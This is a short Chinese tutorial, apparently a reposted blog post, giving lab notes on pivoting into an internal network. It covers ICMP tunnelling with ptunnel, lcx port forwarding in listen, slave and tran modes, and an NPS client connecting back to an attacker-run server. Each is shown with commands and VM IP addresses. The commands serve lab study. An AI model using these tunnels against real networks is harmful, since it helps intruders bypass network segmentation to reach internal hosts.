内网渗透-隧道技术

目录

icmp隧道攻击

环境

操作

lcx内网转发

方案一

方案二

NPS


icmp隧道攻击

环境

跳板机双网卡配置

网卡1

网卡2

攻击机网络配置

靶机网络配置

操作

攻击机192.168.217.128

ptunnel -p 192.168.217.135 -lp 2000 -da 192.168.131.129 -dp 80

http://192.168.217.128:5000 就是访问192.168.131.129:80

跳板机192.168.217.135,192.168.131.128

service apache2 restart

Iptables -A INPUT -p tcp -s 192.168.217.128 -j DROP

ptunnel

靶机192.168.131.129

 

lcx内网转发

攻击机192.168.131.130

跳板机192.168.131.132;192.168.217.136

靶机192.168.217.130

方案一

攻击机:

  执行命令

    lcx -listen 4444 5555

  浏览器访问

 http://192.168.131.130:5555 就是访问192.168.217.130:80

跳板机器

  执行命令

    lcx -slave 192.168.131.130 4444 192.168.217.130 80

目标机器

  window7 sp1 旗舰版

  ip:192.168.217.130

  开放了80端口

方案二

攻击机:

http://192.168.131.132:5000 就是访问192.168.217.130:80

跳板机器

  执行命令

lcx -tran 5000 192.168.217.130 80

目标机器

  window7 sp1 旗舰版

  ip:192.168.217.130

  开放了80端口

NPS

环境设置:

攻击机:kali,一个网卡,nat模式,服务端NPS。

Ip地址:192.168.217.128

./npc

跳板机:kali,两个网卡,nat模式与仅主机模式,安装客户端NPS。

Ip地址1:192.168.131.128

Ip地址2:192.168.217.135

./npc -server=192.168.217.128:8024 -vkey=123456

靶机:windows7,仅主机模式,开通80端口,使用phpstudy,开通80端口,关闭防火墙。

Ip地址:192.168.131.129:80

 

 

 

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>